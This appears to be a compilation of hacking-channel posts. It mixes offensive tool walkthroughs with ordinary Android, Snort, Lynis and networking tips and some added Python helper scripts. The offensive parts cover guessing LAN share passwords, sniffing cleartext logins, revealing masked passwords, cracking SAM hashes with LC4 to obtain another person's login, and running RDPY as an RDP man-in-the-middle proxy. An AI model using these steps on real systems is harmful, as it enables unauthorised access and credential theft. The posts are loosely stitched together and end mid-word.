UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 fast cracking guide :

A) Network Assassin II (English name: NetHacker II)

> Network Assassin is a Chinese network security detection tool written by Tianxing for security professionals. It can search out the hosts on the local area network that expose shares and then scan the shared resources of those hosts.

> Its sniffer function can also intercept the passwords of POP3, FTP and Telnet sessions on the local area network, because these protocols send credentials in the clear.

> A community broadband network is also a kind of local area network, so Network Assassin works well there too.

> After downloading and decompressing the software, double-click the main program nethacker.exe to open Network Assassin. Select the "Search Shared Host" command under "Host Resources", enter the IP address range you want to scan, then click the "Start Search" button to search for hosts with shares.

> When the search completes, the results are displayed at the lower left of the main interface. (If there are no results, try turning off your personal firewall.) Select the corresponding host in the lower left corner and expand it, right-click the shared resource you want, and choose "Map Network Drive" for the directory to be accessed, so that the corresponding directory of the remote computer can be opened in "My Computer".

> If the share has a password set, you can use the password guesser built into Network Assassin. Right-click the shared resource and select "Share Guessing Machine" in the pop-up menu. Before you click "Start Guessing" you must set a suitable dictionary; this is the key to success or failure.

> You can also define the password character set, the combination method and the password length.

> In addition, Network Assassin integrates some related network tools, including an IP/host name converter, a Finger client query tool, a host port scanner, a host finder, a domain name finder, a Telnet client program, etc. You can also view the network status and your own IP.
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Cracking tip 2 :
> Snadboy's Revelation
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) SnadBoy's Revelation is a small but powerful password-revealing tool that shows the text behind "********" password fields in Windows, including passwords saved by some applications (mail clients, FTP programs, etc.). After downloading and installing it, drag the crosshair with the left mouse button onto the masked field and the password is displayed.

2) This is much faster than a full cracking suite. (Xiaorong's "Streamer" (Fluxay) is another tool hackers like to use: it is both a capable scanner and a capable cracking and attack tool.)

3) L0phtCrack 4.0 (LC4)

> LC4 is currently the most popular Windows password cracker. It cracks the password hashes stored in the SAM database, so when you can obtain the SAM file it is the best way to recover the other party's login password. LM and NT hashes are unsalted, which is why dictionary and brute-force attacks against them are so fast.

> It can also import hashes from the local machine or from a remote one.

> Open LC4, create a new session, then click "Import" | "Import from SAM file" and open the SAM file to be cracked. LC4 analyses the file and lists the user names it contains. Then click "Begin Audit" under "Session" to start cracking. If the passwords are not very complex, results appear in a short time.

> If the audit produces nothing, open the cracking options for the session, choose a more comprehensive word list, enable the hybrid and brute-force modes, and start the audit again. A 6-character password falls quickly this way.

> https://sectools.org/tool/l0phtcrack/

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Use adb shell and pm to install an apk package on an Android phone :
t.me/UndercodeTesting

1) After installing Android Studio, adb is usually in /Users/exchen/Library/Android/sdk/platform-tools (on macOS; the user name will differ).

2) Add that directory to PATH or change into it, then run adb devices to list the devices connected to the machine:

./adb devices
List of devices attached
0123456789ABCDEF device
emulator-5554 device

3) The output shows two connected devices: a real phone and an emulator. With two devices attached, every operation, such as installing an apk, must name its target with -s:

./adb -s 0123456789ABCDEF install ~/Downloads/test.apk
Performing Push Install
adb: error: failed to copy '/Users/exchen/Downloads/test.apk' to '/data/local/tmp/test.apk': couldn't read from device
/Users/momo/Downloads/test.apk: 0 files pushed. 92.5 MB/s (131056 bytes in 0.001s)

🦑 The installation failed because adb could not push the apk to /data/local/tmp/. Open adb shell and try chmod to grant permissions; the device denies it:

./adb -s 0123456789ABCDEF shell
shell@Coolpad5367:/ $ chmod -R 755 data
Unable to chmod data: Permission denied

🦑 THE FIX :

> The shell user cannot write to that directory, so push test.apk to the SD card instead:

1) ./adb -s 0123456789ABCDEF push ~/Downloads/test.apk /sdcard

2) If the push succeeds, the SD card is readable and writable. Opening the file in the phone's file manager shows an install button, but it is greyed out and cannot be tapped. Finally, install it with the pm command from the adb shell:

./adb -s 0123456789ABCDEF shell
shell@Coolpad5367:/ $ chmod 755 /sdcard/test.apk
shell@Coolpad5367:/ $ pm install -f /sdcard/test.apk
pkg: /sdcard/test.apk
Success
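The same procedure as an added Python wrapper (my code, not from the original post): it parses `adb devices`, picks a physical device in the `device` state, tries `adb install`, and when that fails falls back to the push-to-/sdcard plus `pm install` route described above (`-r` instead of the post's `-f`, so a reinstall works as well). The `adb devices` output used in the test is constructed; `adb` being on PATH is an assumption.

```python
import subprocess
from typing import List

ADB = "adb"  # assumed to be on PATH; otherwise point this at platform-tools/adb


def parse_adb_devices(output: str, include_emulators: bool = False) -> List[str]:
    """Return the serials whose state is 'device' from `adb devices` output.
    Lines look like '0123456789ABCDEF\tdevice' or 'emulator-5554\tdevice';
    'offline' and 'unauthorized' entries are skipped because adb cannot use them."""
    serials = []
    for line in output.splitlines()[1:]:          # skip "List of devices attached"
        parts = line.split()
        if len(parts) < 2 or parts[1] != "device":
            continue
        if parts[0].startswith("emulator-") and not include_emulators:
            continue
        serials.append(parts[0])
    return serials


def run(args: List[str]) -> subprocess.CompletedProcess:
    return subprocess.run(args, capture_output=True, text=True)


def install_apk(serial: str, apk: str) -> str:
    """Try `adb install`; if the push to /data/local/tmp fails (as on the Coolpad
    above), push the apk to /sdcard and install it with pm inside the device shell."""
    direct = run([ADB, "-s", serial, "install", apk])
    if direct.returncode == 0 and "Success" in direct.stdout:
        return "installed via adb install"
    remote = "/sdcard/" + apk.rsplit("/", 1)[-1]
    pushed = run([ADB, "-s", serial, "push", apk, remote])
    if pushed.returncode != 0:
        raise RuntimeError(f"push to {remote} failed: {pushed.stderr.strip()}")
    pm = run([ADB, "-s", serial, "shell", "pm", "install", "-r", remote])   # -r: reinstall ok
    if "Success" not in pm.stdout:
        raise RuntimeError(f"pm install failed: {pm.stdout.strip()} {pm.stderr.strip()}")
    return "installed via /sdcard + pm install"


if __name__ == "__main__":
    import sys
    serials = parse_adb_devices(run([ADB, "devices"]).stdout)
    if not serials:
        sys.exit("no physical device in 'device' state")
    print(install_apk(serials[0], sys.argv[1]))
```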

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Before cracking an app: why an APK that was decompiled and rebuilt will not install

1) After decompiling an apk with apktool and building it back, the result cannot be installed, whereas the same apk decompiled and rebuilt with ApkToolKit V3.0 installs normally.

2) The reason is that apktool builds the apk back without signing it, and Android refuses to install an unsigned apk. ApkToolKit V3.0 signs the apk after building it.

3) After building with apktool, sign the result with signapk.jar:
java -jar signapk.jar testkey.x509.pem testkey.pk8 test.apk test-signed.apk

> The apktool package attached to this post contains signapk.jar and can be used directly.

> Note that testkey is the public AOSP test key, so the signature proves nothing about who built the apk, and because the rebuilt apk is signed with a different key than the original, it will not install over the original app: uninstall the original first.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 these tips require a little experience
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Android APK decompilation and reversing by undercode :
> Reversing an Android APK is simpler than reversing a Windows PE file:

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) An Android APK is actually a zip archive and can be opened with WinRAR. After extraction you will see the familiar layout: the AndroidManifest.xml file, the various resources and images.

2) If you open the xml in Notepad you will see garbage, because it is stored as binary XML; decode it with the AXMLPrinter2.jar tool:

java -jar AXMLPrinter2.jar AndroidManifest.xml > AndroidManifest.txt

3) Open AndroidManifest.txt and you will see something that looks like source, with no garbage.

> All the .java code of the APK is compiled into the classes.dex file, so to learn how the program works and what it does you must disassemble this file, using the baksmali.jar tool:

java -jar baksmali.jar -o classout/ classes.dex

4) When it finishes, a classout directory is created. Inside it, find the package directory; each .smali file corresponds to a .java class. The .smali code is not Java, but once you get used to it it is simple to read, and much simpler than Windows assembly.

5) After disassembling, we can change code and resources. After modifying, assemble it back with the smali.jar tool:

java -jar smali.jar classout/ -o classes.dex

6) Then put the new classes.dex back into the apk (and re-sign it, as described in the previous post) and the program still runs.

7) Sometimes AXMLPrinter2.jar cannot handle the xml and reports an error, reportedly when the manifest's minSdkVersion is greater than 7. In that case use apktool, which is just three files (aapt.exe, apktool.bat, apktool.jar):

apktool d <file.apk> <dir>    decode the apk into <dir>
apktool b <dir>               build <dir> back into an apk
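An added inspection script (my code, not apktool's or smali's, and not from the original posts) that serves both this post and the signing post above: it lists what a rebuilt APK contains and checks for a v1 (JAR) signature in META-INF and for a v2/v3 APK Signing Block in front of the zip central directory, which is exactly what an unsigned apktool build lacks. The sample APK zips are constructed in code with dummy contents, and the helper that splices in an empty signing block exists only so the v2 check can be exercised offline; it is not how real signing works.

```python
import io
import struct
import zipfile
from typing import Dict

SIG_BLOCK_MAGIC = b"APK Sig Block 42"   # magic defined by the APK Signature Scheme v2


def _central_directory_offset(data: bytes) -> int:
    eocd = data.rfind(b"PK\x05\x06")                       # End of Central Directory record
    if eocd < 0:
        raise ValueError("not a zip file")
    return struct.unpack_from("<I", data, eocd + 16)[0]     # offset of central directory


def has_apk_signing_block(data: bytes) -> bool:
    """v2/v3 signatures live in a block ending with the 16-byte magic that sits
    immediately before the central directory, outside any zip entry."""
    cd = _central_directory_offset(data)
    return cd >= 24 and data[cd - 16:cd] == SIG_BLOCK_MAGIC


def inspect_apk(path_or_bytes) -> Dict[str, object]:
    """Summarise an APK: manifest present, dex files, v1 (JAR) and v2/v3 signatures.
    v1 signing is the META-INF/*.SF file plus a *.RSA/*.DSA/*.EC signature entry."""
    data = path_or_bytes if isinstance(path_or_bytes, bytes) else open(path_or_bytes, "rb").read()
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
    meta = [n for n in names if n.startswith("META-INF/")]
    has_sf = any(n.upper().endswith(".SF") for n in meta)
    has_sig = any(n.upper().endswith((".RSA", ".DSA", ".EC")) for n in meta)
    return {
        "has_manifest": "AndroidManifest.xml" in names,
        "dex_files": sorted(n for n in names if n.endswith(".dex")),
        "v1_signed": has_sf and has_sig,
        "v2_block": has_apk_signing_block(data),
    }


def build_sample_apk(with_v1_signature: bool = False) -> bytes:
    """Constructed sample: a minimal apktool-style output zip with dummy entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")    # binary-XML header only
        z.writestr("classes.dex", b"dex\n035\x00")
        if with_v1_signature:
            z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            z.writestr("META-INF/CERT.SF", "Signature-Version: 1.0\n")
            z.writestr("META-INF/CERT.RSA", b"\x30\x82")           # placeholder PKCS#7 bytes
    return buf.getvalue()


def add_empty_signing_block(data: bytes) -> bytes:
    """Constructed test aid: splice an empty APK Signing Block (uint64 size | pairs |
    uint64 size | magic) before the central directory and fix the EOCD offset."""
    cd = _central_directory_offset(data)
    eocd = data.rfind(b"PK\x05\x06")
    block = struct.pack("<Q", 24) + struct.pack("<Q", 24) + SIG_BLOCK_MAGIC
    patched = bytearray(data[:cd] + block + data[cd:])
    struct.pack_into("<I", patched, eocd + len(block) + 16, cd + len(block))
    return bytes(patched)


if __name__ == "__main__":
    print(inspect_apk(build_sample_apk()))                # unsigned apktool-style build
    print(inspect_apk(build_sample_apk(True)))            # after signapk.jar (v1)
```

Run `inspect_apk("test.apk")` on a real rebuilt file: an apktool output shows `v1_signed: False, v2_block: False`; after signapk.jar `v1_signed` turns True, and a store-built app normally shows `v2_block: True` as well.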

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑 Network configuration - prevent users from browsing through an external proxy :

> Some background knowledge:

1) HTTP/1.0 defines that when a web server and client communicate through a proxy, the proxy adds a Via: header to the HTTP request and response to identify itself, so that proxy loops can be detected.

2) snort is an open source IDS (intrusion detection system) that can run as a host or network IDS. With its many rules it performs pattern matching on captured packets (ip, tcp, udp, icmp) and logs what it finds.

3) libnet is an open source library for building and sending raw network packets.

4) A TCP/IP network is packet switched: plain TCP does not authenticate segments, so any host that can see a connection can inject a forged packet into it.

5) Snort can also generate IP packets through libnet, and can tear down a TCP connection by sending TCP RST packets.

🦑 Prerequisites:

1) Snort runs on the (Linux) router, or on a switch port mirror on the same network segment as the router, so that it sees all the traffic.

🦑 Implementation:

1) Compile snort with the flexresp (flexible response) feature.

2) Define a snort rule:
alert tcp $HOME_NET any <> $EXTERNAL_NET 80 (msg:"block proxy"; content:"Via:"; nocase; resp:rst_all; sid:1000001;)

> The original post used uricontent:"Via:", which only searches the normalised request URI and never the headers, so it would not match a Via: header; content: (on Snort 2.x ideally with the http_header modifier) is what is needed, and Snort 2.x requires a sid.

🦑 Effect:
Internal users can browse external websites normally. If an internal user's browser is configured to use an external proxy, the HTTP request and response headers contain Via: ..., the snort rule matches the connection, and snort sends RST packets to both the client and the server sockets, terminating the TCP connection.

> Caveats: this only works for plaintext HTTP on port 80. HTTPS traffic, including HTTP CONNECT tunnels through a proxy, shows no Via: header on the wire, and a proxy that does not add Via: is invisible to this rule. RST injection also races the real traffic, so part of a page may already have loaded.
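The detection logic of the rule above, as an added Python example (my code, not snort's, and not from the original post) run over constructed HTTP messages: the Via header is found by parsing the header block, and a plain substring match is shown beside it to make the point about scoping the signature to headers rather than the URI or the body.

```python
import re
from typing import Dict, Optional, Tuple

HEADER_END = re.compile(rb"\r?\n\r?\n")


def split_headers(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Return (start_line, {lower-case name: value}, body) for one HTTP message."""
    m = HEADER_END.search(raw)
    head, body = (raw[:m.start()], raw[m.end():]) if m else (raw, b"")
    lines = head.split(b"\n")
    headers = {}
    for line in lines[1:]:
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].strip().decode("latin-1"), headers, body


def proxy_via(raw: bytes) -> Optional[str]:
    """Value of the Via header if the message passed through a proxy, else None."""
    return split_headers(raw)[1].get("via")


def should_reset(raw: bytes) -> bool:
    """The decision the snort rule makes: a Via header means an external proxy."""
    return proxy_via(raw) is not None


def naive_match(raw: bytes) -> bool:
    """What an unscoped substring match does: it also fires on the body or the URL."""
    return b"Via:" in raw


# Constructed samples: a direct request, the same request via a proxy, a proxied
# response, and a POST whose body merely mentions "Via:".
DIRECT_REQ = (b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
              b"User-Agent: Mozilla/4.0\r\n\r\n")
PROXIED_REQ = (b"GET http://www.example.com/index.html HTTP/1.1\r\nHost: www.example.com\r\n"
               b"Via: 1.1 proxy.isp.example:3128 (squid)\r\n\r\n")
PROXIED_RESP = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nVia: 1.1 proxy.isp.example\r\n"
                b"Content-Length: 5\r\n\r\nhello")
BODY_ONLY = (b"POST /post HTTP/1.1\r\nHost: forum.example\r\nContent-Length: 22\r\n\r\n"
             b"Header list: Via: test")

if __name__ == "__main__":
    for name, msg in [("direct", DIRECT_REQ), ("proxied", PROXIED_REQ),
                      ("response", PROXIED_RESP), ("body only", BODY_ONLY)]:
        print(f"{name:10} reset={should_reset(msg)} naive={naive_match(msg)} via={proxy_via(msg)}")
```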

written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Network configuration - the arrival of the home network, by undercode:
> Today the number of PCs in a home has inevitably grown beyond one. After we upgrade our machine, or give one to a child, or the wife brings one home to work on, we have more than one computer at home; in the end we have a bunch of machines.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

The following is a list of the functions each networking solution offers, covering the common home operating systems and two less common ones, Linux and Microsoft NT:

Function                Linux  Unix  NT  Win95  Mac  OS/2
Printer services          x     x    x    x     x    x
File server / sharing     x     *    *    *     *    *
Mail server               x     *    *    *     -    -
Domain Name Server        x     x    *    *     *    *
Web Server                x     x    *    *     *    *
Firewall                  x     *    *    *     -    -
Routing                   x     x    x    -     -    -
Gateway                   x     x    x    -     -    -
Internet                  x     x    x    x     x    x
Ethernet                  x     x    x    x     x    x
Token Ring                x     *    *    *     *    *
Arcnet                    x     *    *    *     *    *
Frame Relay               x     *    *    -     -    -
ISDN                      x     *    *    *     -    -
PPP                       x     x    x    x     x    x
SLIP                      x     x    x    x     x    x
TCP/IP                    x     x    x    x     x    x
X.25                      x     *    *    *     *    *
IPX (Novell Netware)      x     x    x    x     *    *
SMB (Windows network)     x     x    x    x     *    *
Appletalk                 x     *    *    *     x    *
NFS                       x     x    *    *     *    *

x  supported by the system itself
*  needs additional software
-  not supported

After comparing the functions in the chart, some systems can be disregarded. If you are using one of them, that is a pity, but it is best to discuss it with the OEM, since even they will recommend replacing it. Note that all UNIX variants other than Linux are grouped in the UNIX column.

written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 TOP ACTIVE MALWARE IN 2020 :
T.me/UndercodeTesting

1) Emotet is a modular infostealer that downloads or drops banking trojans. It is delivered through malicious download links or attachments, such as PDF or macro-enabled Word documents. Emotet also includes spreader modules to propagate through a network. In December 2018, Emotet was observed using a new module that exfiltrates email content.

2) WannaCry is a ransomware cryptoworm that uses the EternalBlue exploit to spread over SMB. Version 1.0 has a "killswitch" domain which, when reachable, stops the encryption process.

3) Kovter is fileless click-fraud malware and a downloader that evades detection by hiding in registry keys. Reporting indicates that Kovter can have backdoor capabilities and hooks certain APIs for persistence.

4) ZeuS is a modular banking trojan that uses keystroke logging to steal credentials when the user visits a banking website. Since the ZeuS source code leaked in 2011, many other malware families have adopted parts of its codebase, so events classified as ZeuS may actually be other malware reusing ZeuS code.

5) Dridex is a banking trojan that uses malicious macros in Microsoft Office documents with either malicious embedded links or attachments. Dridex is disseminated via malspam campaigns.

6) IcedID is a modular banking trojan targeting banks, payment card providers, and payroll websites. IcedID uses the same distribution infrastructure as Emotet. The malware can monitor a victim's online activity by setting up local proxies for traffic tunnelling, and employs web injection and redirection attacks. It propagates across a network by infecting terminal servers.

7) Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor that gives the attacker full control of the infected device.

8) Mirai is a malware botnet known for compromising Internet of Things (IoT) devices to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has given the attacker access to a device.

9) NanoCore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore accepts commands to download and execute files, visit websites, and add registry keys for persistence.

10) Pushdo is a botnet that has been active since 2007 and operates as a service for malware and spam distribution. Pushdo is known to distribute the Cutwail spambot. The malware uses encrypted communication channels and domain generation algorithms to deliver instructions to its zombie hosts.

written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 updated - Lynis - security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless; installation optional.

🦑 FEATURES :

Automated security auditing
Compliance testing (e.g. ISO27001, PCI-DSS, HIPAA)
Vulnerability detection

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/CISOfy/lynis

2) Execute:
cd lynis; ./lynis audit system

3) If you want to run the software as root, we suggest changing the ownership of the files first. Use chown -R 0:0 to recursively set the owner and group to user ID 0 (root); Lynis checks that its files are not writable by other users when it runs with root privileges.

🦑 MORE :

Parameter          Short  Description
--auditor "Name"          Assign an auditor name to the audit (report)
--checkall         -c     Start the check
--check-update            Check if Lynis is up-to-date
--cronjob                 Run Lynis as a cron job (includes -c -Q)
--help             -h     Show valid parameters
--manpage                 View the man page
--nocolors                Do not use any colors
--pentest                 Perform a penetration test scan (non-privileged)
--quick            -Q     Don't wait for user input, except on errors
--quiet                   Only show warnings (includes --quick, but doesn't wait)
--reverse-colors          Use a different color scheme for light backgrounds
--version          -V     Show program version (and quit)
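What to do with the output: an added example (my code, not Lynis's, and not from the original post) that parses the key=value report Lynis writes to /var/log/lynis-report.dat into scalars, `name[]=` lists and structured warning/suggestion records, then produces a short triage list. The report excerpt is constructed, and the `warning[]=TEST-ID|text|detail|solution|` field layout is an assumption based on the Lynis report format.

```python
import re
from collections import defaultdict
from typing import Dict, List

# warning[]=FIRE-4512|text|detail|solution|  (assumed lynis-report.dat layout)
FINDING = re.compile(r"^(?P<kind>warning|suggestion)\[\]=(?P<test>[A-Z]+-\d+)\|"
                     r"(?P<text>[^|]*)\|(?P<detail>[^|]*)\|(?P<solution>[^|]*)\|?$")


def parse_report(text: str) -> Dict[str, object]:
    """Split lynis-report.dat into scalars, repeated 'name[]=' lists and findings."""
    scalars, lists = {}, defaultdict(list)
    findings = {"warning": [], "suggestion": []}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        m = FINDING.match(line)
        if m:
            findings[m["kind"]].append({k: m[k] for k in ("test", "text", "detail", "solution")})
            continue
        key, value = line.split("=", 1)
        if key.endswith("[]"):
            lists[key[:-2]].append(value)
        else:
            scalars[key] = value
    return {"scalars": scalars, "lists": dict(lists), **findings}


def triage(report: Dict[str, object], min_index: int = 70,
           groups=("AUTH", "FIRE", "SSH", "KRNL")) -> List[str]:
    """Lines a reviewer acts on: hardening index below target, every warning, and
    suggestions from the test groups that matter most for remote exposure."""
    out = []
    idx = int(report["scalars"].get("hardening_index", "0"))
    if idx < min_index:
        out.append(f"hardening index {idx} below target {min_index}")
    for w in report["warning"]:
        out.append(f"WARNING {w['test']}: {w['text']}")
    for s in report["suggestion"]:
        if s["test"].split("-")[0] in groups:
            detail = f" ({s['detail']})" if s["detail"] not in ("", "-") else ""
            out.append(f"suggest {s['test']}: {s['text']}{detail}")
    return out


# Constructed excerpt in the style of /var/log/lynis-report.dat
SAMPLE_REPORT = """\
# Lynis Report
lynis_version=3.0.0
hardening_index=58
os_name=Linux
installed_package[]=openssh-server
installed_package[]=sudo
warning[]=FIRE-4512|iptables module(s) loaded, but no rules active|-|-|
warning[]=KRNL-5830|Reboot of system is most likely needed|-|-|
suggestion[]=AUTH-9262|Install a PAM module for password strength testing|-|-|
suggestion[]=SSH-7408|Consider hardening SSH configuration|PermitRootLogin (set YES to NO)|-|
suggestion[]=HRDN-7230|Harden the system by installing at least one malware scanner|-|-|
"""

if __name__ == "__main__":
    for line in triage(parse_report(SAMPLE_REPORT)):
        print(line)
```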

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 rdp Remote Desktop Protocol :
RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built on the event-driven network engine Twisted. RDPY supports the standard RDP security layer, RDP over SSL and NLA authentication (through the NTLMv2 authentication protocol). It is a Python 2 / Qt4 project, as the paths below show.
twitter.com/undercodeNews

🦑 FEATURES :

RDP man-in-the-middle proxy which records sessions
RDP honeypot
RDP screenshotter
RDP client
VNC client
VNC screenshotter
RSS player

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

$ git clone https://github.com/citronneur/rdpy.git rdpy

$ pip install twisted pyopenssl qt4reactor service_identity rsa pyasn1

$ python rdpy/setup.py install

Or use pip:

$ pip install rdpy

For a virtualenv, you will need to link the Qt4 library into it:

$ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
$ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/

🦑 COMMANDS :

rdpy-rdpclient
rdpy-rdpclient is a simple RDP Qt4 client.

$ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_output_file] [...] XXX.XXX.XXX.XXX[:3389]
You can use rdpy-rdpclient to record a session scenario (rss file), which rdpy-rdphoneypot can replay.

rdpy-vncclient
rdpy-vncclient is a simple VNC Qt4 client.

$ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]

rdpy-rdpscreenshot
rdpy-rdpscreenshot saves the login screen to a file.

$ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]

rdpy-vncscreenshot
rdpy-vncscreenshot saves the first screen update to a file.

$ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]

rdpy-rdpmitm
rdpy-rdpmitm is an RDP proxy that lets you perform a man-in-the-middle attack on the RDP protocol. It records the session scenario into an rss file which can be replayed by rdpy-rssplayer.

$ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port]
The output directory is used to save the rss files, named YYYYMMDDHHMMSS_ip_index.rss. The private key file and the certificate file are ordinary SSL key and certificate files. The RDP protocol negotiates its own security layer: if either parameter is omitted, the proxy's server side uses standard RDP security. Which layer the real server accepts is decided in the X.224 connection negotiation, so a server that requires NLA (it answers RDP_NEG_FAILURE with HYBRID_REQUIRED_BY_SERVER) will not accept a plain RDP or TLS-only connection from the proxy.

rdpy-rdphoneypot
rdpy-rdphoneypot is an RDP honeypot. It replays recorded session scenarios over the RDP protocol.

$ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_pa
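The negotiation that decides whether a proxy like rdpy-rdpmitm can sit in the path, as an added example (my code, not rdpy's, and not from the original post): it builds the client's X.224 Connection Request carrying RDP_NEG_REQ, constructs the server's Connection Confirm with either RDP_NEG_RSP or RDP_NEG_FAILURE, and parses the confirm to tell whether standard RDP security was accepted (downgrade possible) or NLA is enforced. Field layouts follow MS-RDPBCGR; the server replies are constructed here, not captured.

```python
import struct
from typing import Dict

# requestedProtocols / selectedProtocol flags (MS-RDPBCGR RDP_NEG_REQ / RDP_NEG_RSP)
PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID, PROTOCOL_HYBRID_EX = 0x0, 0x1, 0x2, 0x8
TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x01, 0x02, 0x03
FAILURE_CODES = {1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
                 3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
                 5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"}


def _tpkt_x224(tpdu_code: int, payload: bytes) -> bytes:
    """Wrap an X.224 CR/CC TPDU (code, dst-ref, src-ref, class 0) in a TPKT header."""
    x224 = struct.pack(">BHHB", tpdu_code, 0, 0, 0) + payload
    return struct.pack(">BBH", 3, 0, 4 + 1 + len(x224)) + bytes([len(x224)]) + x224


def build_connection_request(requested: int, cookie_user: str = "") -> bytes:
    """Client side: X.224 Connection Request with optional mstshash cookie + RDP_NEG_REQ."""
    cookie = f"Cookie: mstshash={cookie_user}\r\n".encode() if cookie_user else b""
    neg = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested)
    return _tpkt_x224(0xE0, cookie + neg)


def build_connection_confirm(neg_type: int, value: int, flags: int = 0) -> bytes:
    """Server side (constructed for the demo): Connection Confirm with RDP_NEG_RSP
    (value = selectedProtocol) or RDP_NEG_FAILURE (value = failureCode).
    neg_type 0 models a pre-negotiation server that sends no RDP_NEG block at all."""
    neg = struct.pack("<BBHI", neg_type, flags, 8, value) if neg_type else b""
    return _tpkt_x224(0xD0, neg)


def parse_connection_confirm(data: bytes) -> Dict[str, object]:
    ver, _, total = struct.unpack_from(">BBH", data, 0)
    if ver != 3 or total != len(data) or data[5] & 0xF0 != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    neg = data[11:]                       # TPKT(4) + LI(1) + CC header(6)
    if len(neg) < 8:                      # legacy server: standard RDP security only
        return {"type": "legacy", "selected": PROTOCOL_RDP}
    t, flags, length, value = struct.unpack_from("<BBHI", neg, 0)
    if length != 8:
        raise ValueError("bad RDP_NEG length")
    if t == TYPE_RDP_NEG_RSP:
        return {"type": "response", "selected": value, "flags": flags}
    if t == TYPE_RDP_NEG_FAILURE:
        return {"type": "failure", "code": value, "reason": FAILURE_CODES.get(value, "UNKNOWN")}
    raise ValueError(f"unexpected RDP_NEG type {t}")


def downgrade_possible(confirm: bytes) -> bool:
    """True when the server settled on standard RDP security, i.e. a proxy that
    only speaks standard RDP (or TLS without NLA) can be placed in the path."""
    r = parse_connection_confirm(confirm)
    return r["type"] != "failure" and r["selected"] == PROTOCOL_RDP


if __name__ == "__main__":
    req = build_connection_request(PROTOCOL_SSL | PROTOCOL_HYBRID, "user")
    print("CR:", req.hex())
    for name, cc in [("weak", build_connection_confirm(TYPE_RDP_NEG_RSP, PROTOCOL_RDP)),
                     ("nla", build_connection_confirm(TYPE_RDP_NEG_FAILURE, 5))]:
        print(name, parse_connection_confirm(cc), "downgrade:", downgrade_possible(cc))
```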

🦑 TESTED BY UNDERCODE

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 UPDATED - commix, an automated all-in-one OS command injection and exploitation tool.
fb.com/undercodeTesting

